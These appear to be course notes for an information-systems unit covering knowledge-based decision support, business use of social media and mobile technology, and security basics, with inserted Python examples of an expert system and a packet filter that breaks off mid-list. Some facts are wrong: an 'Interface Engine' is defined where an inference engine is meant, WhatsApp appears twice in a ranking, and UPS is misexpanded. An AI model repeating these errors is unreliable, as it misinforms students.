IM IV Unit Notes


Unit IV

INTEGRATED SYSTEMS, SECURITY AND CONTROL


Syllabus: Knowledge based decision support systems, Integrating social media and mobile
technologies in Information system, Security, IS Vulnerability, Disaster Management, Computer
Crimes, Securing the Web.
Knowledge-Based Decision Support System
Implementing a knowledge-based decision support system is one of the best ways to capture,
process, store and share knowledge among employees. The information can be easily
accessed by the user to resolve a variety of problems, issues or concerns.

Before the development of knowledge-driven DSS, employees with high intellect had to
perform knowledge-intensive tasks. An expert in a particular area would know how to
approach a problem and go about it. Similarly, knowledge-based DSS asks relevant
questions, offers suggestions and gives advice to solve a problem. The only difference is that
it’s automated and speeds up the whole process.

What is a Knowledge-Based DSS?


A knowledge-based DSS
▪ is a computer-based reasoning system
▪ that provides information, comprehension and suggestions to users
▪ to support them in decision-making.
It’s an integration of computerized business intelligence tools and technologies customized to
the needs and requirements of an organization. So, the focus is on
▪ Identifying specific knowledge sharing and distribution needs of a company
▪ Setting objectives that need to be attained with a knowledge-driven DSS
▪ The selection of appropriate tools and technologies
▪ Understanding the nature of work and decision-making performed by its potential
users
▪ Selecting data mining techniques
Key Terms and Concepts
A computer-based reasoning system is similar to any other type of decision support system
when it comes to its architecture. But it turns into a knowledge-driven decision support
system when artificial intelligence technologies, management expert systems, data mining
capabilities and other communication mechanisms are integrated.

Before we dig deeper, let’s learn about a few important terms and concepts used alongside
knowledge-driven decision support systems. This will help gain an in-depth understanding of
such support systems.

1. Expertise: A knowledge-based DSS comes with a specific problem-solving expertise.


This expertise is based upon three components:
▪ Knowledge in a particular domain and its associated symptoms and signs
▪ Understanding of the relationships between the various symptoms of a problem
▪ Skills, ways or methods of solving the problem
2. Expert System: A computer system that imitates the decision making capability of a
human expert is called an expert system or an artificial intelligence system. It is
designed to solve problems by
▪ Using if-then rules
▪ Reasoning about knowledge
▪ Drawing inferences from facts and rules
3. Knowledge Discovery and Data Mining: These are interrelated terms used for the
process of extracting valuable knowledge and discovering patterns, in order to
transform the knowledge into an easily comprehensible structure for further use. Data
mining is a buzzword but a misnomer. This is because data mining is a process of
collecting, storing and analysing data, not of finding patterns. Knowledge discovery
goes through a series of steps:
▪ Selection
▪ Pre-processing
▪ Transformation
▪ Data mining
▪ Interpretation
4. Development Environment: It’s the environment in which a decision support system
is developed. It typically includes software for creating a DSS and knowledge base.
The development environment may vary in size, depending upon
production/development needs.
5. Domain Expert: A domain expert is a subject matter expert who has
expertise/authority in a particular domain. A domain expert is an integral part of the
team working on developing a decision support system.
6. Knowledge Engineer: A technical expert who integrates knowledge into a computer
system when developing a decision support system, in order to solve complex
problems that require human expertise.
7. Knowledge Acquisition: It is extraction/mining of knowledge from various sources,
such as experts, databases and external programs.
8. Knowledge Base: It is the collection and storage of structured (facts, rules,
regulations, characteristics, functions, procedures and relationships) and unstructured
information that will be used by a DSS in decision making.
9. Interface Engine: It is a software system to simplify the conception and development
of application interfaces between application systems. Typically, it’s a middleware
application to transform, route and translate messages between various
communication points.
10. Heuristic: It’s an approach to discovery and problem solving by employing practical
methods. These methods may not be optimal but can help achieve immediate goals.

It’s important to be familiar with the technical jargon that experts in this field use, in order to
gain a deeper understanding of knowledge-based DSS.
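The if-then reasoning an expert system performs (terms 2, 7 and 8 above: rules, a knowledge base of facts, and inferences drawn from both), shown as an added example that is not part of these notes: a small forward-chaining inference engine with a “why?” explanation facility. The knowledge base, rule names and advice strings are constructed for illustration and are hypothetical.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Rule:
    """An if-then rule: when every condition is a known fact, assert the conclusion."""
    name: str
    conditions: frozenset
    conclusion: str


@dataclass
class Inference:
    """Result of forward chaining: all known facts plus how each derived fact arose."""
    facts: set
    derived_by: dict = field(default_factory=dict)  # derived fact -> Rule that produced it
    trace: list = field(default_factory=list)       # rule names in firing order


# Constructed knowledge base (hypothetical): an advisor on the exposure of one server.
# Facts are plain strings; conclusions starting with "advise: " are the advice given.
KNOWLEDGE_BASE = [
    Rule("R1", frozenset({"internet_facing", "unpatched"}), "high_exposure"),
    Rule("R2", frozenset({"high_exposure", "stores_customer_data"}), "critical_risk"),
    Rule("R3", frozenset({"high_exposure"}), "advise: apply vendor patches now"),
    Rule("R4", frozenset({"critical_risk"}), "advise: isolate host and notify incident response"),
    Rule("R5", frozenset({"critical_risk", "no_backups"}), "advise: take a verified backup before any change"),
    Rule("R6", frozenset({"unpatched"}), "advise: schedule patching"),
]


def forward_chain(initial_facts, rules):
    """Fire every rule whose conditions are all known, repeating until no new fact appears."""
    inf = Inference(set(initial_facts))
    fired = set()
    changed = True
    while changed:
        changed = False
        for rule in rules:
            if rule.name in fired or not rule.conditions <= inf.facts:
                continue
            fired.add(rule.name)
            inf.trace.append(rule.name)
            if rule.conclusion not in inf.facts:      # only record a genuinely new fact
                inf.facts.add(rule.conclusion)
                inf.derived_by[rule.conclusion] = rule
                changed = True
    return inf


def explain(inf, fact, depth=0):
    """Answer 'why?' for a fact by walking back through the rules that derived it."""
    indent = "  " * depth
    if fact not in inf.facts:
        return [f"{indent}{fact}: unknown"]
    rule = inf.derived_by.get(fact)
    if rule is None:                                  # an initial (given) fact
        return [f"{indent}{fact}: given"]
    lines = [f"{indent}{fact}: by rule {rule.name}"]
    for cond in sorted(rule.conditions):
        lines.extend(explain(inf, cond, depth + 1))
    return lines


def advise(initial_facts, rules=KNOWLEDGE_BASE):
    """Run the engine and return the advice facts, without the 'advise: ' prefix, sorted."""
    inf = forward_chain(initial_facts, rules)
    prefix = "advise: "
    return sorted(f[len(prefix):] for f in inf.facts if f.startswith(prefix))


if __name__ == "__main__":
    observed = {"internet_facing", "unpatched", "stores_customer_data", "no_backups"}
    result = forward_chain(observed, KNOWLEDGE_BASE)
    print("Advice:", advise(observed))
    print("\n".join(explain(result, "advise: isolate host and notify incident response")))
```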

Characteristics of Knowledge-based Decision Support Systems


A knowledge-based DSS is different from conventional systems in the way knowledge is
extracted, processed and presented. The former attempts to emulate human reasoning, while
the latter responds to an event in a predefined manner. The main characteristics of
knowledge-driven decision support systems are:

▪ These systems aid managers in solving complex problems.


▪ These systems allow users to interact with them during the process of decision
making.
▪ The recommendations made by these systems are based on human knowledge.
▪ These systems use a knowledge base that’s engineered keeping in mind the nature of
the problems they will solve.
▪ These systems aid in performing limited tasks.
▪ These systems use heuristic technique of problem solving.
Developing Knowledge-Based Decision Support Systems
Knowledge-based decision support systems are expert systems that are developed when
decision-making cannot be supported using traditional methods. A knowledge-based DSS
project goes through various stages and can be difficult to manage. It’s important to be
committed to monitor the development of a knowledge-based DSS.

Development Stages

▪ Domain identification (Choosing a subject matter)


▪ Conceptualization (idea formation, feasibility testing and commencement)
▪ Formalization (beginning with development officially)
▪ Implementation (completion and execution)
▪ Testing (fixing errors and modifications)

It’s important to monitor project development throughout very closely. It’s a collective effort
of knowledge engineers, domain experts, DSS analysts, users and programmers. And a
project manager keeps track of the scope, time, quality and budget, to ensure optimum
allocation of resources and creation of a quality product. A project manager is the person
responsible for accomplishing the pre-decided objectives of a project.

Knowledge-Based DSS Examples


Here are a few examples of successful and popular knowledge-based decision support systems:

▪ TAXADVISOR: As the name suggests, TAXADVISOR assisted attorneys by
collecting client data and suggesting actions that clients needed to take to settle their
financial profile. Its job was to aid attorneys in taxation and estate planning for clients
with estates greater than $175,000.
▪ Life Insurance Selection Expert System: Meiji Mutual Life Insurance Company, one of
the oldest insurance companies in Japan, deployed XpertRule to select the most suitable
insurance product for an individual from among myriads of products.
Integrating Social Media and Mobile Technology in IS
Social and mobile are two of the largest growth areas in the technology world. Both are
focused on communication, both are undeniably personal and both are very immediate. There
is great synergy between the two areas.
What Is Social Media?
The term social media refers to a computer-based technology that facilitates the sharing of
ideas, thoughts, and information through virtual networks and communities. Social media is
internet-based and gives users quick electronic communication of content, such as personal
information, documents, videos, and photos. Users engage with social media via a computer,
tablet, or smartphone via web-based software or applications. More than 4.5 billion people
use social media, as of October 2021.
Social media originated as a way to interact with friends and family but was later adopted by
businesses that wanted to take advantage of a popular new communication method to reach
out to customers. According to the Pew Research Center, social media users tend to be
younger. Nearly 90% of people between the ages of 18 and 29 used at least one form of
social media.
Types or forms of Social Media
Social media may take the form of a variety of tech-enabled activities. These activities
include photo sharing, blogging, social gaming, social networks, video networks, virtual
worlds, reviews, and much more. Even governments and politicians use social media to
engage with constituents and voters.
Uses of Social Media – in business
For businesses, social media is an indispensable tool. Companies use the platform to find
and engage with customers, drive sales through advertising and promotion, gauge consumer
trends, and offer customer service or support.
Social media's role in helping businesses is significant. It facilitates communication with
customers, enabling the melding of social interactions on e-commerce sites. Its ability to
collect information helps focus on marketing efforts and market research. It helps in
promoting products and services, as it enables the distribution of targeted, timely, and
exclusive sales and coupons to would-be customers. Further, social media can help in
building customer relationships through loyalty programs linked to social media.
The figures for the most popular social media websites as of January 2021 are as follows:
1. Facebook (2.74 billion users)
2. YouTube (2.29 billion users)
3. WhatsApp (2 billion users)
4. Facebook Messenger (1.3 billion users)
5. Instagram (1.22 billion users)
6. Whatsapp (1.21 billion users)
7. TikTok (689 million users)
8. QQ (617 million users)
9. Douyin (600 million users)
10. Sina Weibo (511 million users)
Business applications of social media
In business, social media is used to market products, promote brands, connect to customers and
foster new business. As a communication platform, social media promotes customer feedback
and makes it easy for customers to share their experiences with a company. Businesses can
respond quickly to positive and negative feedback, address customer problems and maintain or
rebuild customer confidence.

Social media is also used for crowdsourcing. That's the practice of using social networking to
gather knowledge, goods or services. Companies use crowdsourcing to get ideas from
employees, customers and the general public for improving products or developing future
products or services.
Examples of business applications of social media include the following:
• Social media analytics. This is the practice of gathering and analyzing data from blogs and
social media websites to assist in making business decisions. The most common use of social
media analytics is to do customer sentiment analysis.
• Social media marketing (SMM). This application increases a company's brand exposure
and customer reach. The goal is to create compelling content that social media users will
share with their social networks. A key component of SMM is social media optimization
(SMO). SMO is a strategy for drawing new visitors to a website. Social media links and
share buttons are added to content, and activities are promoted via status updates, tweets and
blogs.
• Social customer relationship marketing. Social CRM is a powerful business tool. For
example, a Facebook page lets people who like a company's brand like the business's page.
This, in turn, creates ways to communicate, market and network. Social media sites give
users the option to follow conversations about a product or brand to get real-time market data
and feedback.
• Recruiting. Social recruiting has become a key part of employee recruitment strategies. It is
a fast way to reach a lot of potential candidates, both active job seekers and people who were
not thinking about a job change until they saw the recruitment post.
• Enterprise social networking. Businesses also use enterprise social networking to connect
people who share similar interests or activities. Public social media platforms let
organizations stay close to customers and make it easy to conduct market research.
Benefits of social media
Social media provides several benefits, including the following:
• User visibility. Social platforms let people easily communicate and exchange ideas or
content.
• Business and product marketing. These platforms enable businesses to quickly publicize
their products and services to a broad audience. Businesses can also use social media to
maintain a following and test new markets. In some cases, the content created on social
media is the product.
• Audience building. Social media helps entrepreneurs and artists build an audience for their
work. In some cases, social media has eliminated the need for a distributor, because anyone
can upload their content and transact business online.
Mobile Technologies

Mobile technology is a type of technology in which a user utilizes a mobile phone to perform
communications-related tasks, such as communicating with friends, relatives, and others. It is
used to send data from one system to another. Portable two-way communications systems,
computing devices, and accompanying networking equipment make up mobile technology.

Definition: Any gadget with internet capabilities that can be accessed from anywhere is
referred to as mobile technology. Smartphones, tablets, some iPods, and laptops already fall
within this category, but this list will undoubtedly grow in future years.

Mobile technology is becoming increasingly prevalent. Smartphone users have surpassed 3
billion, and the global mobile workforce is expected to reach 1.87 billion by 2022.
Use of Mobile technology
• The incorporation of mobile technology into business has aided telecollaboration. Now,
people can connect from anywhere using mobile technology and access the papers and
documents they need to complete collaborative work.
• Employees are no longer confined to their desks; they can work from anywhere in the
world.
• Mobile technology can help your company save time and money. Employees who work
from home save thousands on a regular basis.
• Mobile phones eliminate the need for costly technology like landline carrier services.
• Cloud-based services are less expensive than traditional systems. Technology can also help
your company become more flexible and productive.
• Mobile technology has the potential to boost productivity significantly. Mobile application
integration saves an average of 7.5 hours per week per employee. Workers can also become
more productive with the use of smartphones and mobile gadgets.
• Cloud-based mobile technology applications have been seen to be more useful than any
smartphone, particularly in terms of available storage space.

Integration of Social Media in business

Social media integration gives your audience more ways to engage and interact with your brand.
You’re creating more opportunities for them to share your content and promote your
products/services for you. The best part: It’s easy to do.

Social Media integration

Definition: Social media integration is the act of using social media accounts as an extension of
your marketing strategy. This is typically accomplished two ways:
i. Directing your social media audience to your website
ii. Allowing your social media accounts to be easily accessed on your website
Think about those social media buttons you see on blog posts and web pages. They allow you to
easily share an interesting piece of content without having to copy and paste the URL. That’s a
perfect example of social media integration in action.
Benefits of Integrating Social Media
Social media integration helps accomplish a few key goals, including increasing your brand
reach and awareness. Social media presents a plethora of opportunities for businesses that can
hugely benefit brands financially and non-financially. The 10 most crucial benefits of
integrating social media are:

• Reach a wider audience with extended exposure.


• Amplify your website’s interaction and engagement capabilities.
• Gain insights into consumers’ social behavior.
• Channelize traffic by integrating social media on the website and vice-versa.
• Enhance your website vibrancy through creative visual social content.
• Build brand image & reputation through communications.
• Build social proof by promoting User-generated content from social media.
• Increase your conversions and sales.
• Deliver a superlative consumer experience.

Ways to integrate Social media with your business

Your website and social media should work together seamlessly. This helps promote your brand
while boosting traffic to your social media accounts.

The ways to integrate social media into your business are:

i. Add social sharing links to your blog posts

These are the social share buttons you see at the bottom of most blog posts. They sometimes also
appear at the top. They help increase awareness of your content, while also giving your readers a
seamless way to share your content. The improved user experience will be a boon to your
website.

ii. Add social posts to your website

One great way to spruce up your website while integrating social media is by including a feed of
social media posts on your pages. These are typically live feeds of your social media posts.
However, you can also use a branded hashtag in order to showcase a feed of posts from your
followers and fans.
iii. Create a social login option

Have you ever gone to a website that allowed you to log in using your Google, Facebook, or
Twitter account? Those are great examples of social logins!
It’s so much easier to use a social media account to log in than creating an entirely new profile,
picking a password, and confirming it on your email—only to have to log in again when you’re
done. Instead, it’s just a few clicks at most and you’re in.

Not only is this a great way to integrate social media on your website, but it’s also the way most
people prefer to log in. In fact, one study found that 73% of users prefer to log in using their social
media accounts.

iv. Place Social Share Plugins on Product Pages

Placing social share plugins on product pages of an e-commerce website is a trending practice.
This is because it helps generate social presence and conversation about the product on the
social media channel.

A social share plugin allows the e-commerce store to place social buttons on a product page.
When a website visitor uses these buttons, the product page is shared on the visitor’s
chosen social channel, alongside the many other social media feeds displayed on the website.
The social share plugins must be placed in close proximity to the image of the product or
services to enable the website visitor to ‘see easily’ and share it quickly.

v. Embed Social Media Widget on Website

Embedding a social media feed widget on a website is one of the most lucrative approaches for
displaying your social media hashtag feed.
A social media widget is capable of displaying all your social media feeds together in one
place. Brand-generated posts and fan-created content (user-generated content) are all
aggregated and extracted by this tool into visually creative social media feeds. Social widgets
work exceptionally well for corporate events, product launch events, promotional influencer
meets, weddings, brand activations and more.

vi. Shoppable Social Media Walls on Website

You can collect & curate social media content on your website, but the highlight is that you can
make your social media content SHOPPABLE. Using the visual commerce solutions from
Taggbox, you can tag products in your social media posts or UGC posts, add a buying
option and embed it as a shoppable social media gallery on your website. This will help you increase
your chances of conversions, build brand reliability & trust, boost engagement, and deliver
a peerless shopping experience.

vii. Display Social Media Videos

Videos grab user attention and let the message sink into the viewer’s mind. Social media videos are
simply videos that are created and shared on social channels. Such videos provide an easy
social media integration on a website, so you can embed the social media feed of your videos
on your website effortlessly.

viii. Integrate Social Media Based Commenting System

Commenting tools encourage conversations and allow for human-to-human interaction thus
creating a strong authenticity and reliability of the information.

These ‘commenting systems’ are designed in a way that requires commenters to sync one of
their social media accounts for commenting. This way only a genuine profile is linked to your
identity as a commenter, and it helps reduce the presence of trolls and spam online.

ix. Showcase Social Media Reviews

Showcasing social proof simply means integrating social reviews and recommendations from your
former customers on your website for your potential buyers and website visitors to see. Social
proof is said to be trusted by 79% of customers, and it also helps augment sales and
website conversions. You can also ask your audience to post a review using your hashtag, and
that hashtag can then be used to create a live hashtag feed display across any marketing
touchpoint!
Social media integration strategies for email marketing

You can integrate social media into your emails. Doing so will allow your readers to easily and
quickly find your social accounts and follow you.

a) Add social sharing links to your footer


Your emails are the perfect place to add social sharing links. As on your website, they can go at
the top or the bottom of your email.

b) Remind subscribers of your social community


One great tactic for social media integration is sending out email blasts showcasing your social
media accounts. This is a great way to invite your subscribers to connect socially by
incentivizing them with the benefits of doing so.

c) Bolster social media campaigns with email blasts


Have a social media giveaway or contest? Or maybe you have an audience poll you want people’s
thoughts on? Maybe you’re trying to collect some user-generated content for a blog post? Email
blasts are a great way to promote them. This is when you send a single email to your entire list
asking them to complete a call to action.

Integrating Mobile Technology in Business

The main ways to integrate mobile into your marketing mix include:

Develop a Mobile friendly Web Site

Developing a mobile friendly website is at the core of a mobile marketing strategy. Make your
web presence more mobile friendly or better able to accommodate content specific to a
campaign.

The following table outlines the usages of a mobile optimized web site, the benefits, what to
measure and how to measure the outcomes.

Uses:
• Creating mobile landing pages for campaigns
• Aiding mobile search results, especially if the mobile site is content specific
• Adopting location based point of sale or “instant purchase” opportunities
• Engaging in mobile commerce
Benefits:
• Improves engagement
• Reduces scrolling and slow downloads
• Creates hyper local marketing opportunities
• Enables campaign integration with other tactics or mediums
• Is quantifiable—can be tracked through analytic programs
• Provides ability to reach customers ‘on-the-go’ and create highly effective two-way communication
• Provides single greatest return on investment
Texting (SMS/MMS)
Text messaging (SMS) and multimedia messaging (MMS) on feature and smartphones have
been well received. They are widely used, not only for personal use, but also in business,
entertainment and education. Texting is twice as popular as browsing or apps. SMS/MMS
marketing represents a more selective and therefore cost-effective opportunity for either
driving traffic or engaging response. The basis of SMS marketing is to make an appealing
offer; it can be a powerful direct response tool with many applications.

Uses:
• Customer text reminders
• Links to mobile coupons, contests
• Sale notifications
• Last minute alert offers
• Transactions—placing orders, or donating to charity, by text
• Product/service support
• Appointment confirmations
• Mobile surveys, polls
Benefits:
• Is quick and easy to implement
• Enables timely and relevant exchange of ideas
• Is convenient
• Has a broad reach
• 90% of devices support SMS
• Creates loyalty or a “following”
• Has CRM capability

SMS/MMS technology offered through smartphones can be used to reach a wider audience.

Mobile Applications (apps)


Mobile applications or apps are compact software programs that perform specific tasks for the
mobile user. Some apps are pre-installed on the mobile device, and others can be downloaded
from a server (e.g. Apple Apps, Blackberry App World, Android Market) or from individual
business/organization websites.

Uses:
• Productivity
• Entertainment
• Utilities (e.g. weather app)
• Social share communications
• Location Search GPS
• Mobile commerce
Benefits:
• Can be highly targeted
• Enable easy interaction and communications to engage customers and build deeper relationships
• Encourage brand recognition
• Offer unique leading edge tools

Mobile Display Advertising


Mobile display advertising is another way to reach a distinct audience incrementally, whether
you advertise on popular mobile sites related to your industry or through mobile ad networks
(similar to an ad agency). Mobile display ads can provide a direct link to your online sales
channels, enabling greater integration and post-click engagement, especially when used in
conjunction with an optimized mobile site.
Mobile display advertising is a form of advertising via mobile (wireless) phones or other mobile
devices. Key elements of mobile advertising include the advertiser, a publisher or mobile ad
network, mobile system operators and mobile devices.

Uses:
• Reaching mobile audience through banner ads that sit above mobile site content
• Working in conjunction with a lead generation landing page
• Offering local coupons or specials in some form, either in your ads, on your mobile site or elsewhere, to draw in customers
Benefits:
• Provides visual display to highlight specific campaigns
• Delivers personal and location relevant messages
• Drives response and brand relationships
• Banner placement “above the fold” offers the best exposure for the advertiser and can quickly engage the mobile user if the message is targeted to them

Quick Response (QR) Codes and Snap Tags


Quick Response Codes (QR Codes) are two-dimensional bar codes that can be scanned and read
by smartphones. Once mobile users scan or snap a picture of your code, they will be directed to
your web page, shown a video, or receive an SMS text, etc.
QR Codes (Quick Response Codes) are barcode images that, when scanned by a mobile device,
take the viewer to a website or landing page.
Snap tags are customized QR codes in ring configurations that, when scanned, open an
interactive communication.

Uses:
QR Code usages:
• Addition to business cards for more contact detail and direct links to social media
• Inclusion in print ad materials to expand on product or services
• Addition to direct mail, event materials for more detailed info
• Placement in storefront windows
• Placement on premium items
Snap Tag usages:
• Each code ring position can open up to different campaigns, response requests or unique reporting data
• SnapTags can be used across different media platforms to deliver marketing campaigns customized for different consumer segments
Benefits:
• Afford more opportunity for sharing and building community
• Bridge the gap between online and offline media – e.g. provide more details than can fit on print materials
• Enable quick call to action – e.g. while the store is closed, passersby can still get information or receive discount offers
• All data collected is reported via an analytics dashboard and recorded as attributes in a consumer database, which helps in your CRM efforts
Location Based Service/Geotargeting Mobile Advertising
Geotargeting is a way for your mobile or website to display content-specific information
depending on the location of the user. Through a mobile network that uses geographical
positioning on mobile devices, you can target your marketing by behaviour, knowing where
your prospective target is located, and make offers and calls to action accordingly.
Uses:
• Promoting events
• Responding to user requests for the nearest service or business, e.g. restaurant, ATM machine
• Participating in apps that provide users navigation to any street address
• Making location-based offers to users of apps that allow them to locate “friends” on a map
• Placing mobile ads that appear only when mobile users are in a particular area
• Advertising on game apps
• Targeting your Google ads based on geographical location or geographical interest
Benefits:
• Very effective for attracting impulse buyers
• Provides convenience and thus builds loyalty
• Ties in nicely with the global positioning software on most smart and feature phones
• Location targeted ads offer more opportunities to reach clients
• Focused ‘local’ strategies can be built into your marketing mix

Mobile Commerce as a Business Activity


Mobile commerce, also known as m-commerce, is the conducting of transactional commerce
using a mobile device. Mobile commerce involves new technologies, services and business
models and is quite different from traditional e-commerce. They open the door to many new
applications and services because they accompany users wherever they go. Users can look for a
nearby restaurant, stay in touch with colleagues, or pay for items at a store.

Uses:
• Promoting products or services on mobile messaging channels, including email, text messaging, mobile app push notifications, QR Code scanning, and social networks
• Texting SMS to deliver product or promotional information alerts, track inquiries and receive order status updates
Benefits:
• Real-time apps improve customer satisfaction
• Knowing where your users are can help you optimize local deals and shipping logistics
• Catches impulse buyers
• Allows for instant customer service interaction
• Builds consumer loyalty through added convenience
Security
All sorts of data, whether government, corporate or personal, need high security; however,
some data, such as that belonging to the government defense system, banks, defense research and
development organizations, etc., is highly confidential, and even a small amount of negligence with
such data may cause great damage to the whole nation. Therefore, such data needs security at a
very high level.
Information systems security is the protection of information systems against unauthorized access
to or modification of information, whether in storage, processing or transit, and against the denial
of service to authorized users, including those measures necessary to detect, document, and counter
such threats.
Definition: Information systems security refers to the processes and methodologies involved
with keeping information confidential, available and assuring its integrity.

It also refers to:

• Access controls, which prevent unauthorized personnel from entering or accessing a
system.
• Protecting information no matter where that information is, i.e. in transit (such as in an
email) or in a storage area.
• The detection and remediation of security breaches, as well as documenting those events.

Information systems security does not just deal with computer information, but also protecting
data and information in all of its forms.
Objectives of Information System Security
There are 3 main objectives, commonly known as CIA – Confidentiality, Integrity and
Availability. It is also called the Information Security Triad (CIA).

1. Confidentiality – means information is not disclosed to unauthorized individuals, entities
and processes.
2. Integrity – means maintaining the accuracy and completeness of data. This means data cannot
be edited in an unauthorized way.
3. Availability – means information must be available when needed.

Security Threats to Information Systems

A computer system threat is anything that leads to loss or corruption of data or physical damage
to the hardware and/or infrastructure.
What is a Security Threat?
A security threat is defined as a risk that can potentially harm computer systems and the
organization. The cause could be physical, such as someone stealing a computer that contains
vital data. The cause could also be non-physical, such as a virus attack. Here we will define a
threat as a potential attack from a hacker that can allow them to gain unauthorized access to a
computer system.
What are Physical Threats?
A physical threat is a potential cause of an incident that may result in loss or physical damage to
the computer systems.
The following list classifies the physical threats into three main categories:
• Internal: These threats include fire, unstable power supply, humidity in the rooms housing
the hardware, etc.
• External: These threats include lightning, floods, earthquakes, etc.
• Human: These threats include theft, vandalism of the infrastructure and/or hardware,
disruption, and accidental or intentional errors.
To protect computer systems from the above mentioned physical threats, an organization must
have physical security control measures.
The following list shows some of the possible measures that can be taken:
• Internal: Fire threats can be prevented by the use of automatic fire detectors and
extinguishers that do not use water to put out a fire. An unstable power supply can be
mitigated by the use of voltage controllers. An air conditioner can be used to control the
humidity in the computer room.
• External: Lightning protection systems can be used to protect computer systems against
such threats. Lightning protection systems are not 100% perfect, but to a certain extent
they reduce the chances of lightning causing damage.
• Human: Threats such as theft can be prevented by the use of locked doors and restricted
access to computer rooms.
What are Non-physical threats?
A non-physical threat is a potential cause of an incident that may result in:
• Loss or corruption of system data
• Disruption of business operations that rely on computer systems
• Loss of sensitive information
• Illegal monitoring of activities on computer systems
• Cyber security breaches and others
The non-physical threats are also known as logical threats. The following list is the common
types of non-physical threats:
• Virus
• Trojans
• Worms
• Spyware
• Key loggers
• Adware
• Denial of Service Attacks
• Distributed Denial of Service Attacks
• Unauthorized access to computer systems resources such as data
• Phishing
• Other Computer Security Risks
To protect computer systems from the above-mentioned threats, an organization must
have logical security measures in place.
To protect against viruses, Trojans, worms, etc. an organization can use anti-virus software.
In addition to the anti-virus software, an organization can also have control measures on the
usage of external storage devices and on visiting websites that are likely to download
unauthorized programs onto the user’s computer.
Unauthorized access to computer system resources can be prevented by the use of
authentication methods. The authentication methods can be in the form of user IDs and strong
passwords, smart cards or biometrics, etc.
Intrusion-detection/prevention systems can be used to protect against denial of service
attacks. There are other measures too that can be put in place to avoid denial of service attacks.
Tools for Security
In order to ensure the confidentiality, integrity, and availability of information, organizations can
choose from a variety of tools.

i) Authentication
Authentication can be accomplished by identifying someone through one or more of three
factors: i) something they know, ii) something they have and iii) something they are.
For example, the most common form of authentication today is the user ID and password.
Identifying someone only by something they have, such as a key or a card, can also be
problematic. When that identifying token is lost or stolen, the identity can be easily stolen.
The final factor, something you are, is much harder to compromise. This factor identifies a user
through the use of a physical characteristic, such as an eye-scan or fingerprint. Identifying
someone through their physical characteristics is called biometrics.
ii) Access Control

Once a user has been authenticated, the next step is to ensure that they can only access the
information resources that are appropriate. This is done through the use of access control. Access
control determines which users are authorized to read, modify, add, and/or delete information.
Several different access control models exist.
iii) Encryption

Many times, an organization needs to transmit information over the Internet or transfer it on
external media such as a CD or flash drive. In these cases, even with proper authentication and
access control, it is possible for an unauthorized person to get access to the data.
Encryption is a process of encoding data upon its transmission or storage so that only authorized
individuals can read it. This encoding is accomplished by a computer program, which encodes
the plain text that needs to be transmitted; then the recipient receives the cipher text and decodes
it (decryption). In order for this to work, the sender and receiver need to agree on the method of
encoding so that both parties can communicate properly. Both parties share the encryption key,
enabling them to encode and decode each other’s messages. This is called symmetric key
encryption. This type of encryption is problematic because the key is available in two different
places.
iv) Password Security
Single-factor authentication with a user ID and password turns out to be extremely easy to
compromise. Good password policies must be put in place in order to ensure that passwords
cannot be compromised. Below are some of the more common policies that organizations should
put in place.
• Require complex passwords.
• Change passwords regularly.
• Train employees not to give away passwords.
v) Backups
Another essential tool for information security is a comprehensive backup plan for the entire
organization. Not only should the data on the corporate servers be backed up, but individual
computers used throughout the organization should also be backed up. A good backup plan
should consist of several components.
• A full understanding of the organizational information resources.
• Regular backups of all data. Critical data should be backed up daily, while less critical
data could be backed up weekly.
• Offsite storage of backup data sets. It is essential that part of the backup plan is to store
the data in an offsite location.
• Test of data restoration. This will ensure that the process is working and will give the
organization confidence in the backup plan.
Additional concepts related to backup include the following:
• Universal Power Supply (UPS). A UPS is a device that provides battery backup to
critical components of the system, allowing them to stay online longer and/or allowing
the IT staff to shut them down using proper procedures in order to prevent the data loss
that might occur from a power failure.

vi) Firewalls

Another method that an organization should use to increase security on its network is a firewall.
A firewall can exist as hardware or software (or both).
A hardware firewall is a device that is connected to the network and filters the packets based on a
set of rules.
A software firewall runs on the operating system and intercepts packets as they arrive at a
computer.
A firewall protects all company servers and computers by stopping packets from outside the
organization’s network that do not meet a strict set of criteria. A firewall may also be configured
to restrict the flow of packets leaving the organization. This may be done to eliminate the
possibility of employees watching YouTube videos or using Facebook from a company
computer.
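As an added example (not code from these notes), the following Python models the packet filtering just described: an ordered rule set, default deny for inbound traffic, and outbound rules that block a destination range. The corporate address range, the rule format and the sample packets are constructed for illustration.

```python
"""Rule-based packet filter modelled on the firewall described above.
Added example, not from the original notes: the corporate address range,
the rule format and the sample packets are constructed for illustration."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Constructed corporate address range; anything outside it is "the Internet".
INTERNAL = ip_network("10.0.0.0/8")


@dataclass(frozen=True)
class Packet:
    src: str      # source IP address
    dst: str      # destination IP address
    proto: str    # "tcp" or "udp"
    dport: int    # destination port


@dataclass(frozen=True)
class Rule:
    direction: str               # "in" (entering the network) or "out" (leaving it)
    action: str                  # "allow" or "deny"
    src: str = "0.0.0.0/0"       # CIDR the source must fall in
    dst: str = "0.0.0.0/0"       # CIDR the destination must fall in
    proto: str = "any"           # "tcp", "udp" or "any"
    dport: Optional[int] = None  # None matches every port

    def matches(self, pkt: Packet, direction: str) -> bool:
        return (
            self.direction == direction
            and ip_address(pkt.src) in ip_network(self.src)
            and ip_address(pkt.dst) in ip_network(self.dst)
            and self.proto in ("any", pkt.proto)
            and self.dport in (None, pkt.dport)
        )


def direction_of(pkt: Packet) -> str:
    """A packet sourced inside the corporate range is leaving; any other is entering."""
    return "out" if ip_address(pkt.src) in INTERNAL else "in"


def filter_packet(rules: List[Rule], pkt: Packet) -> str:
    """Evaluate rules in order; the first match decides. Nothing matched means
    the packet did not meet the criteria, so it is dropped (default deny)."""
    direction = direction_of(pkt)
    for rule in rules:
        if rule.matches(pkt, direction):
            return rule.action
    return "deny"


# Constructed policy: from outside, only HTTPS to the public web server gets in;
# from inside, web and DNS may leave, except to a blocked video-site range
# (the notes' example of restricting packets that leave the organization).
RULES = [
    Rule("in", "allow", dst="10.0.1.10/32", proto="tcp", dport=443),
    Rule("out", "deny", dst="203.0.113.0/24"),   # constructed "video site" range
    Rule("out", "allow", proto="tcp", dport=443),
    Rule("out", "allow", proto="tcp", dport=80),
    Rule("out", "allow", proto="udp", dport=53),
]

if __name__ == "__main__":
    samples = [
        Packet("198.51.100.7", "10.0.1.10", "tcp", 443),   # Internet -> web server: allow
        Packet("198.51.100.7", "10.0.1.10", "tcp", 22),    # Internet -> SSH: deny
        Packet("10.0.2.5", "203.0.113.9", "tcp", 443),     # workstation -> video site: deny
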